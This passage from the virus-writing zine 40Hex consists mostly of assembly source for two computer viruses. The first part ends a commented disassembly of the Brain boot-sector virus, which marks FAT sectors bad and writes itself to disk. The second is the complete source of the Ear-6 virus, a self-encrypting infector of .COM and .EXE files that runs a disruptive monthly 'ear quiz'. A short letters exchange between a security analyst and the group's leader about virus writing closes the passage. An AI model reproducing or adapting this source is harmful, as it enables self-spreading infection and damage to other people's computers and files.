                call    readFAT                 ; Get FAT ID byte
                mov     ax,word ptr ds:[offset readbuffer]
                cmp     ax,0FFFDh               ; is it 360K disk?
                je      is360Kdisk              ; continue if so
                mov     al,3                    ; al=3 == not good disk
                stc                             ; flag error
                retn                            ; and exit
		mov	cx,37h
                mov     FATManipreadcounter,0   ; none found yet
                call    FATentry12bit           ; get entry in FAT
                cmp     ax,0                    ; unused?
                jne     notunused
                inc     FATManipreadcounter     ; one more found unused
                cmp     FATManipreadcounter,3   ; If need more,
                jne     tryanother              ;  go there
                jmp     short markembad         ; found 3 consecutive
                nop                             ; empty sectors
                mov     FATManipreadcounter,0   ; must start over
                inc     cx                      ; try next sector
                cmp     cx,163h                 ; end of disk?
                jne     checknextsector         ; if not, continue
                mov     al,1                    ; al=1 == none empty
                stc                             ; Indicate error
                mov     dl,3                    ; 3 times
                call    markbad12bit
		dec	cx
		dec	dl
                jnz     markanotherbad
		inc	cx
                call    calc1sttrack
                call    writeFAT                ; update FAT
                mov     al,0                    ; al=0 == ok
                clc                             ; indicate success

                push    cx
		push	dx
                mov     si,offset readbuffer    ; si -> buffer
		mov	al,cl
                shr     al,1
                jc      low_12                  ; low bits
                call    clus2offset12bit
                mov     ax,[bx+si]              ; get FAT entry
                and     ax,0F000h               ; mark it bad
		or	ax,0FF7h
                jmp     short putitback         ; and put it back
                call    clus2offset12bit
                mov     ax,[bx+si]              ; get FAT entry
                and     ax,0Fh                  ; mark it bad
		or	ax,0FF70h
                mov     [bx+si],ax              ; replace FAT entry
                mov     word ptr ds:[400h][bx+si],ax ; in two places
		pop	dx
		pop	cx

		push	cx
                mov     si,offset readbuffer    ; si->buffer
		mov	al,cl
                shr     al,1
; Part 3 of the virus starts here
                jc      want_high_12
                call    clus2offset12bit
		mov	ax,[bx+si]
                and     ax,0FFFh
                jmp     short exitFATentry12bit
                call    clus2offset12bit        ; xxxxxxxxxxxx0000
                mov     ax,[bx+si]              ; ^^^^^^^^^^^^wanted
                and     ax,0FFF0h               ; mask wanted bits
                mov     cl,4                    ; and move to correct
                shr     ax,cl                   ; position
		pop	cx

		push	dx
                mov     ax,3
                mul     cx
                shr     ax,1                    ; ax = cx*1.5
		mov	bx,ax
		pop	dx

                mov     ah,2                    ; read
                call    FAT_IO

                mov     ah,3                    ; write
                call    FAT_IO

                mov     cx,4                    ; try four times
		push	cx
		push	ax
                mov     ah,0                    ; reset disk
                int     6Dh                     ; int 13h
		pop	ax
                jc      tryFAT_IOagain
                mov     bx,offset readbuffer
                mov     al,4                    ; 4 sectors
                mov     dh,0                    ; head 0
                mov     dl,curdrive
                mov     cx,2                    ; sector 2
                push    ax                      ; (FAT)
                int     6Dh                     ; int 13h
		pop	ax
                jnc     exitFAT_IO
		pop	cx
                loop    FAT_IOLoop

		pop	ax
		pop	ax
		mov	al,2
                stc                             ; mark error
		pop	cx

		push	cx
                sub     cx,2
                shl     cx,1                    ; 2 sectors/cluster
                add     cx,0Ch                  ; start of data area
                mov     ax,cx                   ; ax = sector
                mov     cl,12h                  ; 4096
                div     cl                      ; ax/4096 = al rem ah
                mov     byte ptr firstsector+1,al
                mov     firsthead,0
		inc	ah
                cmp     ah,9                    ; past track 9?
                jbe     notpasttrack9           ; nope, we are ok
                sub     ah,9                    ; otherwise, adjust
                mov     firsthead,1
                mov     byte ptr firstsector,ah
		pop	cx

                db      0, 0, 0, 0, 0, 0
r_or_w_root     db      3
entrycount      dw      35h

tempsave1       dw      303h
tempsave2       dw      0EBEh
tempsave3       dw      1
tempsave4       dw      100h
		db	0E0h,0D8h, 9Dh,0D7h,0E0h, 9Fh
		db	 8Dh, 98h, 9Fh, 8Eh,0E0h
		db	' (c) ashar 

                call    readroot                ; read in root directory
                jc      donotchangeroot
		push	di
                call    changevolume            ; change volume label
		pop	di
                jc      donotchangeroot
                call    writeroot               ; write back new root dir
; The following is just garbage bytes
		db	0BBh, 9Bh, 04h,0B9h, 0Bh
                db      0,8Ah,7,0F6h,0D8h,88h,4,46h,43h
                db      0E2h,0F6h,0B0h,8,88h,4,0F8h,0C3h
                db      0C6h, 06h

                mov     entrycount,6Ch
                mov     si,offset readbuffer+40h; 3nd dir entry
                mov     tempsave1,dx
                mov     ax,entrycount           ; 6Ch
                shr     ax,1
                mov     tempsave3,ax            ; 36h
                shr     ax,1
                mov     tempsave2,ax            ; 1Bh
                xchg    ax,cx
                and     cl,43h                  ; cx = 3
                mov     di,tempsave2
                add     di,1E3h                 ; di = 01FE
		mov	al,[si]
		cmp	al,0
                je      dolabel                 ; no mo entries
                mov     al,[si+0Bh]             ; attribute byte
                and     al,8                    ; volume label?
                cmp     al,8                    ; yes?
                je      dolabel                 ; then change it!
                add     si,20h                  ; go to next directory entry
                dec     entrycount
                jnz     findlabel               ; loop back
                stc                             ; Error!
		db	8Bh
                mov     bx,[di]                 ; offset a_data
                xor     bx,tempsave3            ; bx = 53Ah
                mov     tempsave3,si            ; si->direntry
		mov	ax,ss
                mov     tempsave1,ax
                mov     tempsave2,sp
		mov	ax,cs
		mov	ss,ax
                mov     sp,tempsave3
                add     sp,0Ch                  ;->reserved area
                mov     cl,51h
		add	dx,444Ch
                mov     di,2555h
		mov	cx,0C03h
                repe    cmpsw
                mov     ax,0B46h
		mov	cx,3
                rol     ax,cl                   ; ax = 5A30h
                mov     tempsave3,ax
		mov	cx,5
		mov	dx,8
                sub     tempsave3,5210h         ; 820h
                push    tempsave3               ; store attributes/reserved
; I haven't commented the remainder of this procedure.
; It basically changes the volume label to read "(c) Brain"

; Comment mode OFF

                mov     ah,[bx]                 ; 5a3h
		inc	bx
                mov     dl,ah
                shl     dl,1
                jc      dowhatever
                mov     dl,[bx]                 ; dl=C2h
                inc     bx                      ; bx=53Eh
                mov     al,dl
                shl     dl,1
                jc      searchstuff
		add	ax,1D1Dh
		push	ax
                inc     tempsave3
                db       73h, 01h               ; jnc $+3
                db      0EAh,0E2h,0E1h, 8Bh, 26h; jmp 268B:E1E2
                xchg    bp,ax
                add     al,0A1h
                xchg    bx,ax
                add     al,8Eh
                sar     bl,1
                add     dh,[bp+si]
                ;db       95h, 04h,0A1h, 93h, 04h, 8Eh
                ;db      0D0h,0FBh, 02h, 32h,0F8h,0C3h

; Comment mode ON

                mov     r_or_w_root,2           ; set action code
                jmp     short do_rw_root        ; easier to do w/
                nop                             ; mov ah, 2
                mov     r_or_w_root,3
                jmp     short do_rw_root        ; this is somewhat useless
                mov     dh,0                    ; head 0
                mov     dl,curdrive
                mov     cx,6                    ; sector 6
                mov     ah,r_or_w_root
                mov     al,4                    ; 4 sectors
                mov     bx,offset readbuffer
                call    doint13h
                jc      exit_rw_root            ; quit on error
		mov	cx,1
                mov     dh,1                    ; head 1
                mov     ah,r_or_w_root
		mov	al,3
		add	bx,800h
                call    doint13h


                mov     tempsave1,ax
                mov     tempsave2,bx
                mov     tempsave3,cx
                mov     tempsave4,dx
		mov	cx,4

		push	cx
                mov     ah,0                    ; Reset disk
                int     6Dh
                jc      errordoingint13h
                mov     ax,tempsave1
                mov     bx,tempsave2
                mov     cx,tempsave3
                mov     dx,tempsave4
                int     6Dh                     ; int 13h
                jnc     int13hsuccess
		pop	cx
                loop    doint13hloop

                stc                             ; indicate error
		pop	cx

		db	0, 0, 0
; Part 4 of the virus starts here
tempstorecx     dw      3
readwritecurrentdata    dw      301h

                call    FATManip
                jc      exitwritevirus
                mov     cursector,1
                mov     curhead,0
                mov     bx,offset readbuffer
                call    readcurrent
                mov     bx,offset readbuffer
                mov     ax,firstsector
                mov     cursector,ax
                mov     ah,firsthead
                mov     curhead,ah
                call    writecurrent
                call    calcnextsector
		mov	cx,5
		mov	bx,200h
                mov     tempstorecx,cx
                call    writecurrent
                call    calcnextsector
		add	bx,200h
                mov     cx,tempstorecx
                loop    writeanothersector

                mov     curhead,0
                mov     cursector,1
		mov	bx,0
                call    writecurrent
                clc                             ; indicate success

                mov     readwritecurrentdata,201h
                jmp     short doreadwrite
                mov     readwritecurrentdata,301h
                jmp     short doreadwrite       ; This is pointless.
		push	bx
		mov	cx,4

		push	cx
                mov     dh,curhead
                mov     dl,curdrive
                mov     cx,cursector
                mov     ax,readwritecurrentdata ; read or write?
                int     6Dh                     ; int 13h
                jnc     readwritesuccessful
                mov     ah,0                    ; reset disk
                int     6Dh                     ; int 13h
		pop	cx
                loop    tryreadwriteagain

		pop	bx
		pop	bx
                stc                             ; Indicate error
		pop	cx
		pop	bx

                inc     byte ptr cursector      ; next sector
                cmp     byte ptr cursector,0Ah
                jne     donecalculate           ; finished calculations
                mov     byte ptr cursector,1    ; clear sector #
                inc     curhead                 ; and go to next head
                cmp     curhead,2               ; if not too large,
                jne     donecalculate           ; we are done
                mov     curhead,0               ; otherwise clear head #
                inc     byte ptr cursector+1    ; and advance cylinder

		db	 64h, 74h, 61h

; read buffer starts here
; insert your favorite boot block below...
brain           ends
40Hex Number 8 Volume 2 Issue 4                                       File 009

                  -=PHALCON/SKISM=- Ear-6 Virus

    The Ear-6 is a parasitic, non-resident, .COM & .EXE infector.  It
infects 5 files everytime it is run.  It will traverse towards the root
directory if fewer than 5 files are found.  We have no clue as to what
the 'AUX error' that Patti talks about.  But then again, Patti isn't
sure as to who she is, let alone an accurate discription on one of our
virii.  On activation (1st of any month), it plays ear quiz with
victim.  Failure to answer the question will result in program
                                        -) Gheap

; [Ear-6]

; El virus de oreja y o?do seis
; Fue escrito por Dark Angel de PHALCON/SKISM
; Yo (el ?ngel oscuro) escrib? este programa hace muchas semanas.
; No deba modificar este programa y da a otras personas COMO SI
; estar? el suyo.

; ?D?nde est? mi llama, mama?

;                       diccionarito
; espa?ol       ingl?s                   magnitud      size
; abre          open                     mango         handle
; aprueba       pass (a test)            m?scara       mask
; atras         back                     mensaje       message
; azado         random                   mes           month
; busca         find                     mont?n        heap
; cierra        close                    oreja, o?do   ear
; cifra         code, encrypt, decrypt   pila          stack
; codo          pointer                  pregunta      question
; corto         terse, short             primer        first
; empieza       begin                    remendar      patch
; escriba       write                    renuncia      reject
; espa?ol       ingl?s                   respuesta     answer
; fecha         date                     salta         exit
; ficha         file                     siguiente     following, next
; ?ndice        table                    suspende      fail (a test)
; ?le gusta?    do you like?             termina       end
; longitud      length                   virus         virus (!)

.model tiny
org     100h

longitud_del_virus = TerminaVir - EmpezarVir
longitud_del_escribir = offset termina_escribir - offset escribir

id = 'GH'                                       ; Representa el l?der de
                                                ; PHALCON/SKISM, Garbageheap
Empezar:  db      0e9h, 0, 0                    ; jmp EmpezarVir

        mov     bx, offset EmpezarCifra
        mov     cx, ((longitud_del_virus + 1) / 2)
hacia_atras:    ; atr?s
        db      2eh
        db      81h, 37h, 0, 0                  ; xor word ptr cs:[bx], 0
        add     bx, 2
        loop    hacia_atras

        call    siguiente                       ; Es estupido, pero es corto
        pop     bp
        sub     bp, offset siguiente

        mov     byte ptr [bp+numinf], 0

        cld                                     ; No es necessario, pero
                                                ; ?por qu? no?
        cmp     sp, id
        jz      SoyEXE
SoyCOM: mov     di, 100h
        push    di
        lea     si, [bp+Primer3]
        jmp     short SoyNada
SoyEXE: push    ds
        push    es
        push    cs
        push    cs
        pop     ds
        pop     es

        lea     di, [bp+EXE_Donde_JMP]  ; el CS:IP original de la ficha
        lea     si, [bp+EXE_Donde_JMP2] ; infectada

        jmp     short SoyNada

NombreDelVirus  db  0,'[Ear-6]',0               ; En ingl?s, ?por supuesto!
NombreDelAutor  db  'Dark Angel',0


        mov     ah, 1ah                         ; Esindicece un DTA nuevo
        lea     dx, [bp+offset nuevoDTA]        ; porque no quiere destruir
        int     21h                             ; el DTA original

        mov     ax, word ptr [bp+remendar1+1]
        mov     word ptr [bp+tempo], ax

        mov     ah, 47h                         ; Obtiene el directorio
        xor     dl, dl                          ; presente
        lea     si, [bp+diroriginal]
        int     21h

        lea     dx, [bp+offset mascara1]        ; "m?scara", no "mascara"
        call    infectar_mascara                ; pero no es possible usar
                                                ; acentos en MASM/TASM.
                                                ; ?Qu? l?stima!
                                                ; mascara1 es '*.EXE',0
        lea     dx, [bp+offset mascara2]        ; mascara2 es '*.COM',0
        call    infectar_mascara                ; infecta las fichas de COM

        cmp     byte ptr [bp+numinf], 5         ; ?Ha infectada cinco fichas?
        jg      saltar                          ; Si es verdad, no necesita
                                                ; busca m?s fichas.
        mov     ah, 3bh                         ; Cambia el directorio al
        lea     dx, [bp+puntos]                 ; directorio anterior
        int     21h                             ; ('..', 'punto punto')
        jnc     looper

saltar: lea     dx, [bp+backslash]              ; Cambia el directorio al
        mov     ah, 3bh                         ; directorio terminado.
        int     21h

        mov     ah, 2ah                         ; Activa el primer de
        int     21h                             ; cada mes
        cmp     dl, 1                           ; Si no es el primer,
        jnz     saltarahora                     ; ?saltar ahora! (duh-o)

        mov     ah, 2ch                         ; ?Qu? hora es?
        int     21h

        cmp     dl, 85                          ; 85% probabilidad de
        jg      saltarahora                     ; activaci?n

        and     dx, 7                           ; Un n?mero quasi-azado
        shl     dl, 1                           ; Usalo para determinar
        mov     bx, bp                          ; que preguntar? la virus
        add     bx, dx
        mov     dx, word ptr [bx+indice]        ; ?ndice para el examencito
        add     dx, bp
        inc     dx
        push    dx                              ; Salva el codo al pregunta

        mov     ah, 9                           ; Escriba el primer parte de
        lea     dx, [bp+mensaje]                ; la pregunta
        int     21h

        pop     dx                              ; Escriba el parte de la oreja
        int     21h                             ; o el o?do
        dec     dx
        push    dx                              ; Salva la respuesta correcta

        lea     dx, [bp+secciones]              ; Escriba los secciones de la
        int     21h                             ; oreja y el o?do

        mov     ah, 7                           ; Obtiene la respuesta de la
        int     21h                             ; "v?ctima"
        cmp     al, '1'                         ; Necesita una respuesta de
        jl      trataotrarespuesta              ; uno hasta tres
        cmp     al, '3'                         ; Renuncia otras respuestas
        jg      trataotrarespuesta

        int     29h                             ; Escriba la respuesta

        pop     bx                              ; El codo al respuesta
                                                ; correcta
        mov     ah, 9                           ; Prepara a escribir un
                                                ; mensaje
        cmp     al, byte ptr [bx]               ; ?Es correcta?
        jz      saltarapidamente                ; ?l aprueba el examencito.
                                                ; Pues, salta r?pidamente.
        lea     dx, [bp+suspendido]             ; Lo siento, pero ?Ud. no
        int     21h                             ; aprueba el examencito f?cil!

        mov     ah, 4ch                         ; Estudie m?s y el programa
        jmp     quite                           ; permitir? a Ud a continuar.

        lea     dx, [bp+aprueba]
        int     21h
        mov     ah, 1ah                         ; Restaura el DTA original
        mov     dx, 80h
        cmp     sp, id - 4                      ; ?Es EXE o COM?
        jz      vuelvaEXE
        int     21h                             ; Restaura el DTA y vuelva
        retn                                    ; a la ficha original de COM

        pop     es
        pop     ds                              ; ds -> PSP

        int     21h

        mov     ax, es
        add     ax, 10h                         ; Ajusta para el PSP
        add     word ptr cs:[bp+EXE_Donde_JMP+2], ax
        add     ax, word ptr cs:[bp+PilaOriginal+2]
        mov     ss, ax
        mov     sp, word ptr cs:[bp+PilaOriginal]
        db      0eah                            ; JMP FAR PTR SEG:OFF
EXE_Donde_JMP dd 0
PilaOriginal  dd 0

EXE_Donde_JMP2  dd 0
PilaOriginal2   dd 0

        mov     ah, 4eh                         ; Busca la ficha primera
        mov     cx, 7                           ; Cada atributo
        int     21h
        jc      hasta_la_vista_bebe             ; No la busca

        xor     al, al
        call    abrir                           ; Abre la ficha

        mov     ah, 3fh
        mov     cx, 1ah
        lea     dx, [bp+buffer]
        int     21h

        mov     ah, 3eh                         ; Cierra la ficha
        int     21h

        lea     si,[bp+nuevoDTA+15h]            ; Salva cosas sobre la ficha
        lea     di,[bp+f_atrib]                 ; Por ejemplo, la fecha de
        mov     cx, 9                           ; creaci?n
        rep     movsb

        cmp     word ptr [bp+buffer], 'ZM'      ; ?Es EXE o COM?
        jz      buscaEXE
        mov     ax, word ptr [bp+f_long]        ; ?Cuan grande es la ficha?
        sub     ax, longitud_del_virus + 3      ; Adjusta para el JMP
        cmp     ax, word ptr [bp+buffer+1]      ; ?Ya es infectada?
        jnz     infecta_mi_burro                ; "infect my ass"
        jmp     short BuscaMas
        cmp     word ptr [bp+buffer+10h], id
        jnz     infecta_mi_burro
        mov     ah, 4fh                         ; Busca otra ficha...
        jmp     short brb_brb
hasta_la_vista_bebe:                            ; ?Le gusta Arnold?

        ; AX = longitud de la ficha infectada
        lea     si, [bp+buffer]

        cmp     word ptr [si], 'ZM'
        jz      InfectaEXE
        push    ax

        mov     cx, word ptr [bp+tempo]
        mov     word ptr [bp+remendar1+1], cx

        lea     di, [bp+Primer3]
        push    si

        mov     byte ptr [bp+buffer], 0e9h
        pop     di
        add     ax, longitud_del_virus

        mov     cx, 3
        jmp     short   TerminaInfeccion
        les     ax, [si+14h]                    ; Salva el original empieza
        mov     word ptr [bp+EXE_Donde_JMP2], ax; CS:IP de la ficha infectada
        mov     word ptr [bp+EXE_Donde_JMP2+2], es

        les     ax, [si+0Eh]                    ; Salva la original locaci?n
        mov     word ptr [bp+PilaOriginal2], es ; de la pila
        mov     word ptr [bp+PilaOriginal2+2], ax

        mov     ax, word ptr [si + 8]
        mov     cl, 4
        shl     ax, cl
        xchg    ax, bx

        les     ax, [bp+offset nuevoDTA+26]
        mov     dx, es
        push    ax
        push    dx

        sub     ax, bx
        sbb     dx, 0

        mov     cx, 10h
        div     cx

        mov     word ptr [si+14h], dx           ; Nuevo empieza CS:IP
        mov     word ptr [si+16h], ax

        mov     cl, 4
        shr     dx, cl
        add     ax, dx
        mov     word ptr [si+0Eh], ax           ; y SS:SP
        mov     word ptr [si+10h], id

        pop     dx                              ; Restaura el magnitud de
        pop     ax                              ; la ficha

        add     ax, longitud_del_virus          ; A?ada el magnitud del virus
        adc     dx, 0
        mov     cl, 9
        push    ax
        shr     ax, cl
        ror     dx, cl
        adc     dx, ax
        pop     ax
        and     ah, 1

        mov     word ptr [si+4], dx             ; Nuevo magnitud de la ficha
        mov     word ptr [si+2], ax

        push    cs
        pop     es

        mov     ax, word ptr [si+14h]
        sub     ax, longitud_del_virus + offset Empezarvir
        push    ax

        mov     cx, 1ah
        mov     al, 2
        call    abrir

        mov     ah, 40h
        lea     dx, [bp+buffer]
        int     21h

        mov     ax, 4202h
        xor     cx, cx
        cwd                                     ; xor dx,dx
        int     21h

        mov     ah, 2ch                         ; N?meros azados en CX y DX
        int     21h
        mov     word ptr [bp+remendar3+2], cx   ; Es el nuevo n?mero de la
                                                ; cifra
        and     cx, 31                          ; Pone un n?mero azado para el
        add     cx, ((longitud_del_virus + 1) / 2); magnitud de la ficha.  Por
                                                ; eso, los scanners necesitan
        mov     word ptr [bp+remendar2+1], cx   ; usar "wildcards"
        lea     di, [bp+tempstore]
        mov     al, 53h                         ; push bx
        stosb                                   ; (no destruir el mango de la
                                                ;  ficha)
        lea     si, [bp+shwing]                 ; Copia las instrucciones
        push    si                              ; para formar la cifra
        mov     cx, longitud_de_la_cifra
        push    cx
        rep     movsb

        mov     al, 5bh                         ; pop bx
        stosb                                   ; (recuerda mango de la ficha)

        lea     si, [bp+escribir]               ; Copia las instrucciones
        mov     cx, longitud_del_escribir       ; para a?ada el virus a la
        rep     movsb                           ; ficha

        mov     al, 53h                         ; push bx

        pop     cx                              ; Copia las instrucciones
        pop     si                              ; para invalidar la cifra
        rep     movsb
        mov     ax, 0c35bh                      ; pop bx, retn

        pop     ax

        ; Codo del comienzo de la cifra
        add     ax, offset EmpezarCifra + longitud_del_virus
        mov     word ptr [bp+remendar1+1], ax

        call    antes_del_tempstore

        mov     ax, 5701h                       ; BX = mango de la ficha
        mov     dx, word ptr [bp+f_fecha]
        mov     cx, word ptr [bp+f_hora]
        int     21h                             ; Restaura fecha y hora

        mov     ah, 3eh
        int     21h

        xor     ch, ch
        mov     cl, byte ptr [bp+f_atrib]
        mov     ax, 4301h
        lea     dx, [bp+offset nuevoDTA + 30]     ; Busca un ficha en el DTA
        int     21h

        inc     byte ptr [bp+numinf]

        jmp     BuscaMas

Primer3  db 0CDh, 20h, 0
puntos   db '..',0
mascara1 db '*.EXE',0
mascara2 db '*.COM',0

abrir:  mov     ah, 3dh                         ; Abrir un ficha
        lea     dx, [bp+nuevoDTA+30]            ; Nombre de la ficha es en
        int     21h                             ; el DTA
        xchg    ax, bx

indice  dw      offset oreja1, offset oreja2, offset oreja3, offset oreja4
        dw      offset oreja5, offset oreja6, offset oreja4, offset oreja1
oreja1  db      '1','Auditory Canal

oreja2  db      '1','Lobe

oreja3  db      '2','Anvil

oreja4  db      '2','Eustachian Tube

oreja5  db      '3','Auditory Nerve

oreja6  db      '3','Cochlea

mensaje db      'PHALCON/SKISM 1992 [Ear-6] Alert!',13,10,'Where is the 

secciones db    ' located?',13,10
        db      ' 1. External Ear',13,10
        db      ' 2. Middle Ear',13,10
        db      ' 3. Inner Ear',13,10,'( )',8,8,'

; No es bueno.
suspendido db   13,10,'You obviously know nothing about ears.'
        db      13,10,'Try again after some study.',13,10,'

; ?Espero que s?!
aprueba db      13,10,'Wow, you know your ears!  Please resume work.',13,10
        db      '

        mov     ah, 40h
        mov     cx, TerminaVir - EmpezarVir
        lea     dx, [bp+EmpezarVir]
        int     21h

backslash db '\'

TerminaVir = $

; Los que sigue son en el mont?n...
longitud_de_la_cifra = offset EmpezarCifra - offset shwing

diroriginal db 64 dup (?)
tempo       dw ?
nuevoDTA    db 43 dup (?)
numinf      db ?
; tempstore es el buffer para el parte del programa que a?ada el virus al fin
; de otro programa
tempstore   db (longitud_de_la_cifra*2+longitud_del_escribir+5) dup (?)
                                                ; a?ada cinco para los pop,
                                                ; los push, y el retn
buffer      db 1ah dup (?)
f_atrib     db      ?                           ; atributo de la ficha
f_hora      dw      ?                           ; hora de creaci?n
f_fecha     dw      ?                           ; fecha de creaci?n
f_long      dd      ?                           ; magnitud de la ficha

        end     Empezar

40Hex Number 8 Volume 2 Issue 4                                       File 010

    Letters to the editor!  Well, as you can imagine when I got this
message I was quite startled.  Sorry Paul, no top billing this time :-).
Although it is at this point, that I would like to say a couple things.
For instance, the virus community seems to think that their actions go
unnoticed.  As you might imagine, this is not quite true.  C'mon,
security people get their hands on 40Hex shortly after our boards get
it.  Just letting you know that big brother is watching :).

40-Hex Response:

   As a Security Analyst I find 40-Hex an incredibly interesting magazine.
The magazine presents entirely different viewpoints then what is in the
industry magazines such as Virus Bulletin, Virus News International and 
Virus News and Reviews.   Although all three of these publications are good
and very useful to me in my job, 40-Hex does indeed keep my mind open.  It
discusses viruses in depth, including commented source code, and has been a
real learning tool for me.  There is just not anywhere that you can get the
detailed analysis of a virus except in a magazine like 40-Hex.  I can't help
but be torn between my thirst for knowledge about virii and how they work,
and the fear that the more knowledge about virus writing becomes available to
the public, the greater chance that there is going to be more and more garbage
out there and more and more irresponsible people releasing this garbage on
their "friends and neighbors".

   I do want to thank 40-Hex for what I consider a very favorable review.  I
had to laugh about the comments, because frankly I agreed with them.  I guess
that I do get a little melodramatic sometimes.  But I do honestly believe 
that the knowledge exists out there to create a program/virus that will
be able to escape detection by any method in use today.  Whether it will 
ever be written and whether it will have destructive capabilities I don't 
really know. I don't know of any virus writers that make profits off 
their work.  While all the anti-virus developers, although they complain
about the work that they have to do to keep up with the virus writers, 
certainly make a nice profit on something like a Michelangelo scare.  So 
the only motivation for the virus writer is the challenge of creating a 
nearly undetectable virus.  

   I am very curious myself to see if the NCSA's prediction of 40,000 virii  
by 1994 comes true.  I certainly agree with 40-Hex that most of 
these virii will be hacks of some of the existing code out there now. The 
anti-virus industry itself can't decide on how to count different strains of 
viruses, so anyone will be able to make whatever claim they want anyway.

   Finally, Dr. Solomon said it best informally at the First International 
Virus Prevention Conference.  He was talking about how America was founded
on freedom and the rights of the individual.  He said that Americans seem
far too willing, in his opinion, to voluntarily give up those rights.  Right
now, virus writing is not illegal.  And hopefully it never will be, because
what you or I do with our own personal computers is no one else's business 
but our own.  But when we interfer with someone else's computer or data or
life, that I believe that is where the line is drawn.   Its going to be a 
very long and hard process to determine responsibility for damages caused by
a virus.  Passing a law to make virus writing itself illegal will not solve 
the problem.  Something, though, has to be done to protect an individual's
or a corporation's rights to have a virus-free working environment.  There
are enough problems with buggy commercial software, without having to worry
about virii hitting your computers too.  But until that time comes part of
my job will continue to be warning people about the dangers of viruses and
helping them protect their data.

                                                    Paul Melka

Response to a Response to a Response:

    As the head of the -=PHALCON/SKISM=-, I find your letter a very
interesting response.  I thank you for your raving reviews on 40Hex.  We
try to make it a magazine that everyone can learn from.  Well, I still
debate the undetectable virus issue.  Regarding the virus writer/anti-virus
issue, I definately agree, that the anti-virus people are motivated by greed
more then anything else.   I am glad to see that you agreed with my oh so
witty comments, they weren't meant to be abusive, just a little comic relief.
    I agree with you on the issues regarding a virus-free working
environment.  But, as you already know,  writing a virus isn't
illegal, it is the spreading that is illegal.  Unfortunately, it is too
late to start working on anti-virus writing legislation now.  The damage
has been done.  The virus issue is fairly similiar to the AIDS issue.
You have to use protection, no matter what.  There will never be an end
to virii.  Even if everyone stopped writing virii, the infection rate
wouldn't decrease.  I  don't know of many people that get hit by the
newer strains that have been coming out.  Most people still get hit by
Jerusalem, Stoned, and other 'classics'.
    I would be very interested in what solutions you may have come up with
to protect the rights of individuals and corporations.  I hadn't heard about
Dr. Solomon's comments, until I recieved your letter.  Quite frankly, I agree
with what he is saying.  Another major problem with making virus writing
illegal is the definition of a virus, or trojan for that matter.  It is
very difficult to come up with a concrete definition.
    I appreciate your response, and definately encourage other people, either
pro- or anti- virus to respond!
